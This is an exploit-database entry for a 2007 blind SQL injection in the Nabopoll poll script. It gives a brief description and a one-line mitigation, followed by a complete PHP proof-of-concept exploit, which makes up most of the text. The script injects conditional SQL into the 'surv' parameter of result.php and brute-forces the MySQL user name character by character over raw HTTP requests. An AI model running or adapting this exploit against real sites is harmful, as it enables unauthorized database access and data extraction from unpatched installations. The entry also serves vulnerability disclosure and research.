Nabopoll Blind SQL Injection P0C Exploit

vendor:

Nabopoll

by:

s0cratex

5.5

CVSS

MEDIUM

Blind SQL Injection

CWE

Product Name: Nabopoll

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Nabopoll Blind SQL Injection P0C Exploit

This is a Proof of Concept exploit for the Nabopoll Blind SQL Injection vulnerability. The exploit allows an attacker to extract the MySQL user by manipulating the 'surv' parameter in the 'result.php' page. The exploit iterates through ASCII values of characters to extract the user one character at a time.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks.

Source

Exploit-DB raw data:

<?
# Nabopoll Blind SQL Injection P0C Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex@hotmail.com

error_reporting(0);
ini_set("max_execution_time",0);

// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; //you can verify the number entering in the site and viewing the results...

echo "==================================================\n";
echo "Nabopoll SQL Injection -- Proof of Concept Exploit\n";
echo "--------------------------------------------------\n\n";
echo " -- MySQL User: ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "/result.php?surv=".$survey."/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),".$j.",1))=".$x."),1,0)))/*";
$cnx = fsockopen($srv,$port);
fwrite($cnx,"GET ".$path.$xpl." HTTP/1.0\r\n\r\n");
while(!feof($cnx)){ if(ereg("power",fgets($cnx))){ $user.=chr($x);echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
?>

# milw0rm.com [2007-02-21]